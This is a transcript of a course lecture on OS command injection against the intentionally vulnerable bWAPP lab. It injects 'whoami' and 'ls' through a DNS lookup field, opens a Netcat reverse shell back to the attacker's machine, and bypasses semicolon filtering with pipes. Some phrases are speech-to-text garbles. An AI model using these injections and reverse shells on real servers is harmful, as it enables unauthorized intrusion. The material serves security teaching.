Command Injection & SSI
The course is part of this learning path
In this course, we continue working on bWAPP and we're going to use it to learn about some new attacks, namely command injection and SSI vulnerabilities.
Hi. Within this lecture, we're going to finally be covering the OS Command Injections. So, we have opened the OS Command Injection page and as you can see, there is a DNS lookup over here and if we just run it, we can see it looks up the DNS records of the nsa.co. Of course, we can write any website that we want and we can see the result back in here and in the information gathering section, we're actually going to cover the different kind of DNS lookup tools and we're going to see how we can actually see or use these results as well. But right now we know that when we write something over here, it sends it to the server and server runs this command and it gets back to us and shows like a result page or something like a paragraph in here. We know about that. Of course, we can try to understand it in a better way using the Burp Suite even though it's pretty self-explanatory. Even though I didn't use the interceptor over here, I haven't intercepted any kind of request. I can still see the requests that are made in here. I can do the intercept and I can come over here and just hit on the Lookup and I can see the request. It's a POST request, as you can see. It goes to this website, command i.php, and send some parameters like a target and a form. So, the target will be nsa.gov and the form will be submit. So, if you cannot sit on the URL, you can see it from here. Like we have seen before, if you want, you can change the request and forward it in a way that you want. So, there are two parameters, first of which is target and the second of which is form. So, if I forward this, I can get the results back. So, even though I don't see the parameters in the URL, I can see it in the request of the Burp Suite.
As I said before, you don't even have to do this with an intercept. So, if you turn this off or you can come over here to target after you forward this. You can still see the request and response. Here you go is the response of the request that we made. It's in the HTML form and it's displayed to us by interpreting the HTML code with our browser. So, that's how it works. So, what we can do, we can try to do DNS lookup to other websites and most of the time, when we see something like this, we can actually just immediately think about OS command injection. So, what I can do. I can just go to google.com and with a ; over here, I can try to run whoami like we have done before. So, if I Lookup, it's in the scale intercepting mode. As you can see, we see the target over here like that. So, I'm going just turn this off. If I come back, I can see www-data in here. So, it's good news. It's being executed on the server so I can just do some other stuff like with a ; rather than who am I, I can try to do ls for example and it will show me the files and folders in the current working directory like this. So it's again, a code injection. It's being run. It's being executed on the server. So, if you find something like this, then it will vert abounty. And what we can do next is to try to do a Netcat, for example and listen for incoming connections in the Kali Linux and try to hack into that website because it will be executed on the server again. So, this will bring us so many opportunities in here. And let me open the Kali terminal and just try to listen for incoming connections. So, I'm going to do the same old thing. I'm going to say Netcat nc -nvlp 1234. So, remember our code or command. We can run Netcat with nc with a space we can specify the IP address that we may want to send this connection to, which is my own Kali Linux IP which is 10.0.24.
So, we have to specify the same part over here with a space 1234 and execute this in bin/bash like this or bin as h if it doesn't work. Don't forget the spaces between the e and if I do look lookup and here we go. Now, we get the connection back in color. So, if I run whoami, then I can see the details over here. Now, I hacked into the server so I'm getting back the results. So, we have seen this thing before. We know how to use Netcat and it's working over there as well. So, if you know that something is running some commands on the server, it's worth a shot. And of course, this won't be as easy this is but again, it would be some kind of easy. So, let me just take this into medium level and I believe we have to stop this with ctrl c in order to make this work. So, I'm inside of the medium level right now. And if I come over here, this is still working. If I do the same old stuff with ; and do ls, let's see if this works. And here you go. It doesn't work. It kind of implemented some sort of security hardening. So, if I do something like this, it won't work either. So, what can we do next? Maybe they try to filter out the ; itself. And is there any way to bypass this filter? Of course, we can try it. But in order to do that, you have to know how this command line works. So maybe you don't know. I'm going to show you anyhow but you can do some other stuff other than putting some ;s over there. You can do piping. You can do & and let me show you how it's done. So, if you go to your Kali Linux, you can try to run and execute some commands like this. So, with ;, you can write this and both of them will be executed in order.
So, first ls, then pwd but also there are a couple of other methods that you can use. So, what do I mean by that? I mean piping, for example. So, this is a pipe sign. You can do this with alt and dash or optional Dashing Mack. Alt and Dashing Windows optional Dashing Mack and this stands for piping the input for an output, for example, or piping the output for an input. So, if I say ls, if I pipe the result of the ls to something else, then I can say something like this. Of course, this doesn't make sense to run it this way because I'm not using any input in pwd. If I had been using any input then it would get the input of the ls and use it in the pwd comment but this time, since it's a comment on its own, it didn't run the ls. It actually run the ls, ran the ls. It executed the ls but it didn't use it as a parameter or something like that so, we only see the pwd. Other thing is something like this ls && pwd, so it's basically the same thing. They both execute the ls & pwd. So, rather than ;, you can try & for example, over here and write pwd. So, if I execute this, it still doesn't work as you can see and doesn't work as well. So, maybe we can try piping and see if they filtered that out. So, if I do piping and say pwd and here we go. It run the nsa.gov thing but it doesn't show us the result. And we are not interested in that result. We are interested in the malicious part which is after what we write after the piping. So, that's how you bypass filters. If you get suspicious about command injection, then you're definitely going to have to try piping & and ; in order to see if that works or not. Now, I hope you understood what we are doing over here. Even though we found a solution at this time, it may not be so easy to find OS command injections so, I'm going to show you a tool to automatize this process and actually get a shellback. So, this tool is called Comics and we're going to see how it works within the next lecture.
Atil is an instructor at Bogazici University, where he graduated back in 2010. He is also co-founder of Academy Club, which provides training, and Pera Games, which operates in the mobile gaming industry.